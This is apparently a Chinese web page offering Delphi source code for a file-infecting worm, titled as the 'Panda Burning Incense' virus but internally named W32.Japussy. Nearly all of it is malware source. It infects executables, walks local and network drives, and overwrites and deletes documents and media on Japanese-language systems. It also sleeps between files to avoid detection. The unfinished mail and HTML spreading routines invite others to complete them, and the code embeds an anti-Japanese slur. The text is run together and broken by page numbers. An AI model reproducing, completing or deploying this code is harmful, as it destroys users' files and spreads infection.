熊猫烧香病毒源代码

1、“熊猫烧香”简介：“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件，被病毒感染的文件图标均变为“熊猫烧香”。同时，受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。目前已有百万台电脑受害。programJapussy;usesWindows,SysUtils,Classes,Graphics,ShellAPI,Registry;constHeaderSize=82432;/病毒体的大小IconOffset=$12EB8;/PE文件主图标的偏移量/在我的Delphi5S

2、P1上面编译得到的大小，其它版本的Delphi可能不同/查找2800000020的十六进制字符串可以找到主图标的偏移量HeaderSize=38912;/Upx压缩过病毒体的大小IconOffset=$92BC;/Upx压缩过PE文件主图标的偏移量/Upx1.24W用法:upx-9-8086Japussy.exeIconSize=$2E8;/PE文件主图标的大小-744字节IconTail=IconOffset+IconSize;/PE文件主图标的尾部ID=$44444444;/感染标记/垃圾码，以备写入Catchword=Ifaraceneedtobekilledout,itmustbeYa

3、mato.+Ifacountryneedtobedestroyed,itmustbeJapan!+*W32.Japussy.Worm.A*;$R*.RESfunctionRegisterServiceProcess(dwProcessID,dwType:Integer):Integer;stdcall;externalKernel32.dll;/函数声明varTmpFile:string;Si:STARTUPINFO;Pi:PROCESS_INFORMATION;IsJap:Boolean=False;/日文操作系统标记判断是否为Win9xfunctionIsWin9x:Boolean;var

4、Ver:TOSVersionInfo;beginResult:=False;Ver.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);ifnotGetVersionEx(Ver)thenExit;if(Ver.dwPlatformID=VER_PLATFORM_WIN32_WINDOWS)then/Win9xResult:=True;end;在流之间复制procedureCopyStream(Src:TStream;sStartPos:Integer;Dst:TStream;dStartPos:Integer;Count:Integer);varsCurP

5、os,dCurPos:Integer;beginsCurPos:=Src.Position;dCurPos:=Dst.Position;Src.Seek(sStartPos,0);Dst.Seek(dStartPos,0);Dst.CopyFrom(Src,Count);Src.Seek(sCurPos,0);Dst.Seek(dCurPos,0);end;将宿主文件从已感染的PE文件中分离出来，以备使用procedureExtractFile(FileName:string);varsStream,dStream:TFileStream;begintrysStream:=TFileStrea

6、m.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);trydStream:=TFileStream.Create(FileName,fmCreate);trysStream.Seek(HeaderSize,0);/跳过头部的病毒部分dStream.CopyFrom(sStream,sStream.Size-HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;填充STARTUPINFO结构procedureFillStartupInfo(varSi:ST

7、ARTUPINFO;State:Word);beginSi.cb:=SizeOf(Si);Si.lpReserved:=nil;Si.lpDesktop:=nil;Si.lpTitle:=nil;Si.dwFlags:=STARTF_USESHOWWINDOW;Si.wShowWindow:=State;Si.cbReserved2:=0;Si.lpReserved2:=nil;end;发带毒邮件procedureSendMail;begin/哪位仁兄愿意完成之？end;感染PE文件procedureInfectOneFile(FileName:string);varHdrStream,Src

8、Stream:TFileStream;IcoStream,DstStream:TMemoryStream;iID:LongInt;aIcon:TIcon;Infected,IsPE:Boolean;i:Integer;Buf:array0.1ofChar;begintry/出错则文件正在被使用，退出ifCompareText(FileName,JAPUSSY.EXE)=0then/是自己则不感染Exit;Infected:=False;IsPE:=False;SrcStream:=TFileStream.Create(FileName,fmOpenRead);tryfori:=0to$108d

9、o/检查PE文件头beginSrcStream.Seek(i,soFromBeginning);SrcStream.Read(Buf,2);if(Buf0=#80)and(Buf1=#69)then/PE标记beginIsPE:=True;/是PE文件Break;end;end;SrcStream.Seek(-4,soFromEnd);/检查感染标记SrcStream.Read(iID,4);if(iID=ID)or(SrcStream.Size10240)then/太小的文件不感染Infected:=True;finallySrcStream.Free;end;ifInfectedor(no

10、tIsPE)then/如果感染过了或不是PE文件则退出Exit;IcoStream:=TMemoryStream.Create;DstStream:=TMemoryStream.Create;tryaIcon:=TIcon.Create;try/得到被感染文件的主图标(744字节)，存入流aIcon.ReleaseHandle;aIcon.Handle:=ExtractIcon(HInstance,PChar(FileName),0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream:=TFileStream.Creat

11、e(FileName,fmOpenRead);/头文件HdrStream:=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);try/写入病毒体主图标之前的数据CopyStream(HdrStream,0,DstStream,0,IconOffset);/写入目前程序的主图标CopyStream(IcoStream,22,DstStream,IconOffset,IconSize);/写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream,IconTail,DstStream,IconTail,Hea

12、derSize-IconTail);/写入宿主程序CopyStream(SrcStream,0,DstStream,HeaderSize,SrcStream.Size);/写入已感染的标记DstStream.Seek(0,2);iID:=$44444444;DstStream.Write(iID,4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName);/替换宿主文件DstStream.Free;end;except;end;end;将目标文件写入垃圾码后删除

13、procedureSmashFile(FileName:string);varFileHandle:Integer;i,Size,Mass,Max,Len:Integer;begintrySetFileAttributes(PChar(FileName),0);/去掉只读属性FileHandle:=FileOpen(FileName,fmOpenWrite);/打开文件trySize:=GetFileSize(FileHandle,nil);/文件大小i:=0;Randomize;Max:=Random(15);/写入垃圾码的随机次数ifMax5thenMax:=5;Mass:=Sizediv

14、Max;/每个间隔块的大小Len:=Length(Catchword);whileiMaxdobeginFileSeek(FileHandle,i*Mass,0);/定位/写入垃圾码，将文件彻底破坏掉FileWrite(FileHandle,Catchword,Len);Inc(i);end;finallyFileClose(FileHandle);/关闭文件end;DeleteFile(PChar(FileName);/删除之exceptend;end;获得可写的驱动器列表functionGetDrives:string;varDiskType:Word;D:Char;Str:string;

15、i:Integer;beginfori:=0to25do/遍历26个字母beginD:=Chr(i+65);Str:=D+:;DiskType:=GetDriveType(PChar(Str);/得到本地磁盘和网络盘if(DiskType=DRIVE_FIXED)or(DiskType=DRIVE_REMOTE)thenResult:=Result+D;end;end;遍历目录，感染和摧毁文件procedureLoopFiles(Path,Mask:string);vari,Count:Integer;Fn,Ext:string;SubDir:TStrings;SearchRec:TSearc

16、hRec;Msg:TMsg;functionIsValidDir(SearchRec:TSearchRec):Integer;beginif(SearchRec.Attr16)and(SearchRec.Name.)and(SearchRec.Name.)thenResult:=0/不是目录elseif(SearchRec.Attr=16)and(SearchRec.Name.)and(SearchRec.Name.)thenResult:=1/不是根目录elseResult:=2;/是根目录end;beginif(FindFirst(Path+Mask,faAnyFile,SearchRec

17、)=0)thenbeginrepeatPeekMessage(Msg,0,0,0,PM_REMOVE);/调整消息队列，避免引起怀疑ifIsValidDir(SearchRec)=0thenbeginFn:=Path+SearchRec.Name;Ext:=UpperCase(ExtractFileExt(Fn);if(Ext=.EXE)or(Ext=.SCR)thenbeginInfectOneFile(Fn);/感染可执行文件endelseif(Ext=.HTM)or(Ext=.HTML)or(Ext=.ASP)thenbegin/感染HTML和ASP文件，将Base64编码后的病毒写入/

18、感染浏览此网页的所有用户/哪位大兄弟愿意完成之？endelseifExt=.WABthen/Outlook地址簿文件begin/获取Outlook邮件地址endelseifExt=.ADCthen/Foxmail地址自动完成文件begin/获取Foxmail邮件地址endelseifExt=INDthen/Foxmail地址簿文件begin/获取Foxmail邮件地址endelsebeginifIsJapthen/是倭文操作系统beginif(Ext=.DOC)or(Ext=.XLS)or(Ext=.MDB)or(Ext=.MP3)or(Ext=.RM)or(Ext=.RA)or(Ext=.W

19、MA)or(Ext=.ZIP)or(Ext=.RAR)or(Ext=.MPEG)or(Ext=.ASF)or(Ext=.JPG)or(Ext=.JPEG)or(Ext=.GIF)or(Ext=.SWF)or(Ext=.PDF)or(Ext=.CHM)or(Ext=.AVI)thenSmashFile(Fn);/摧毁文件end;end;end;/感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑Sleep(200);until(FindNext(SearchRec)0);end;FindClose(SearchRec);SubDir:=TStringList.Create;if(F

20、indFirst(Path+*.*,faDirectory,SearchRec)=0)thenbeginrepeatifIsValidDir(SearchRec)=1thenSubDir.Add(SearchRec.Name);until(FindNext(SearchRec)0);end;FindClose(SearchRec);Count:=SubDir.Count-1;fori:=0toCountdoLoopFiles(Path+SubDir.Strings+,Mask);FreeAndNil(SubDir);end;遍历磁盘上所有的文件procedureInfectFiles;varDriverList:string;i,Len:Integer;beginifGetACP=932then/日文操作系统IsJap:=True;/去死吧！DriverList:=GetDrives;